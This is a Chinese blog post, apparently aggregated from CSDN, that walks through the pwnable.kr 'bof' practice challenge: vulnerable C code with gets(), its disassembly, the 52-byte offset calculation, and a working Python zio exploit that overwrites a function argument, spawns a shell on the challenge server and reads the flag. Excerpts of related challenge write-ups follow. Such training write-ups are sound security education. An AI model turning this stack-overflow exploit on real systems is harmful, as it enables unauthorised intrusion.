代码先锋网 代码片段及技术文章聚合

pwnable.kr [Toddler's Bottle] - bof

Nana told me that buffer overflow is one of the most common software vulnerability.
Is that true?

Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

简单的栈溢出练习。
源码如下:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

这里需要构造栈溢出,淹没至前一个栈帧的当前函数的参数位置。
linux下可以借助gdb进行动态调试,利用objdump进行静态反编译。
这里可使用objdump来静态查看栈分配情况objdump -d bof
由题设只需关注main()和func()

0000062c <func>:
 62c:   55                      push   %ebp
 62d:   89 e5                   mov    %esp,%ebp
 62f:   83 ec 48                sub    $0x48,%esp
 632:   65 a1 14 00 00 00       mov    %gs:0x14,%eax
 638:   89 45 f4                mov    %eax,-0xc(%ebp)
 63b:   31 c0                   xor    %eax,%eax
 63d:   c7 04 24 8c 07 00 00    movl   $0x78c,(%esp)
 644:   e8 fc ff ff ff          call   645 <func+0x19>   ; call printf()
 649:   8d 45 d4                lea    -0x2c(%ebp),%eax  ; char[32] -- offset to ebp
 64c:   89 04 24                mov    %eax,(%esp)       ; 传参
 64f:   e8 fc ff ff ff          call   650 <func+0x24>   ; call gets()
 654:   81 7d 08 be ba fe ca    cmpl   $0xcafebabe,0x8(%ebp)
 65b:   75 0e                   jne    66b <func+0x3f>
 65d:   c7 04 24 9b 07 00 00    movl   $0x79b,(%esp)
 664:   e8 fc ff ff ff          call   665 <func+0x39>
 669:   eb 0c                   jmp    677 <func+0x4b>
 66b:   c7 04 24 a3 07 00 00    movl   $0x7a3,(%esp)
 672:   e8 fc ff ff ff          call   673 <func+0x47>
 677:   8b 45 f4                mov    -0xc(%ebp),%eax
 67a:   65 33 05 14 00 00 00    xor    %gs:0x14,%eax
 681:   74 05                   je     688 <func+0x5c>
 683:   e8 fc ff ff ff          call   684 <func+0x58>
 688:   c9                      leave  
 689:   c3                      ret    

0000068a <main>:
 68a:   55                      push   %ebp
 68b:   89 e5                   mov    %esp,%ebp
 68d:   83 e4 f0                and    $0xfffffff0,%esp
 690:   83 ec 10                sub    $0x10,%esp
 693:   c7 04 24 ef be ad de    movl   $0xdeadbeef,(%esp)
 69a:   e8 8d ff ff ff          call   62c <func>
 69f:   b8 00 00 00 00          mov    $0x0,%eax
 6a4:   c9                      leave  
 6a5:   c3                      ret    
 6a6:   90                      nop

可以发现 char overflowme[32] 在当前栈帧中距离EBP的偏移为0x2c,即44,再加上ESP的4,返回地址的4,即从局部变量overflowme首地址52byte的位置即为当前函数的参数key的地址。
借助python库zio(an easy-to-use io library for pwning development, supporting an unified interface for local process pwning and TCP socket io.)写脚本跑出flag。

from zio import *
host = "pwnable.kr" #143.248.249.64
port = 9000
io = zio((host, port), print_read=False, print_write=False)
payload = "a"*52 + "\xbe\xba\xfe\xca" + "\n"
io.write(payload+"\n")
io.write("cat flag\n")
buf = io.read_until("\n")
print buf
$ python run.py
daddy, I just pwned a buFFer :)

版权声明:本文为weixin_34013044原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34013044/article/details/88145719

智能推荐

【pwnable.kr】bof

题目描述 Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running at : nc pwnab...

pwnable.kr—bof

pwnable.kr—bof 我的思路 这是一道缓冲区溢出的题目;最近刚好看了一点相关内容;有一点思路 我尝试打印出key和overflow的地址;然后考虑利用gets函数可能产生溢出的特性;输入内容,从而将key覆盖 计算可得中间相差52bit;那么需要向overflow中写入52bit+key的位数(0xcafebabe) 1.首先查看源代码;发现这是一道栈溢出的题目;可以首先输出...

pwnable.kr wp bof

题目 题解 局部变量buf溢出覆盖到函数参数key, 使key == 0xcafebabe...

【pwnable.kr】day3:bof

pwnable:bof pwnable.kr:bof 题目链接 question 先看下文件,然后nc上去进行数据输入 bof.c analyse 把bof拖进IDA里看下 在main函数调用func时,留出位置给key,所以让buffer溢出到key,填入0xcafebabe即可。IDA告诉我们s的位置位于ebp-2Ch处,而key的位置在ebp+8h处。中间要填上52个字节。 get flag...

pwnable 题目解析:[Toddler's Bottle] - cmd2 绕过过滤字符

0x10 题目描述 源码 此处源码过滤了 = PATH export / ` flag 用户输入的这些字符都会被过滤。 0x20 题目分析 0x21 方法一:特殊替代 可以使用 ${PWD} 全局变量,这个变量代表当前系统路径,我们可以到系统的根目录下,${PWD}bin${PWD}cat 一样能够达到 /bin/cat 的效果,你会发现,在根目录下,${PWD} 与 / 是一样的。 这里还需要注...

猜你喜欢

PWN学习之[Toddler''s Bottle]-[passcode]

打开passcode.c,可以看到源码如下: 观察login()函数,可以看到在输入passcode1和passcode2时,由于scanf的变量没有使用&,执行scanf函数时,会将passcode当作地址执行。 使用gdb调试程序,奇怪的事情出现了,发现login和welcome函数的ebp相同。 经过计算发现,name(ebp-0x70)与passcode1(ebp-0x10)只相差...

PWN学习之[Toddler''s Bottle]-[fd]

在linux命令行界面输入ssh [email protected] -p2222 密码为guest 链接上后发现目录下有fd fd.c和flag三个文件,直接cat flag查看flag会显示无权限,必须通过fd可执行文件进行获取flag. 查看fd.c,源码比较简单 通过read()函数读取数据到buf字符数组中,然后与“LETMEWIN”进行比较,如果一致,则执行system...

PWNABLE_03_bof

PWNABLE_03_bof 相关信息如下: Download : http://pwnable.kr/bin/bof Download :http://pwnable.kr/bin/bof.c Running at : nc pwnable.kr 9000 缺陷代码bof.c如下: hint: buffer overflow 阅读原代码,gets()显然没有控制输入长度,当key等于0xcafe...

pwnable.kr [leg]

pwnable.kr [leg] Daddy told me I should study arm. But I prefer to study my leg! Download : http://pwnable.kr/bin/leg.c Download : http://pwnable.kr/bin/leg.asm ssh [email protected] -p2222 (pw:guest) 才学...

pwnable.kr [mistake]

pwnable.kr [mistake] We all make mistakes, let’s move on. (don’t take this too seriously, no fancy hacking skill is required at all) This task is based on real event Thanks to dhmonkey hin...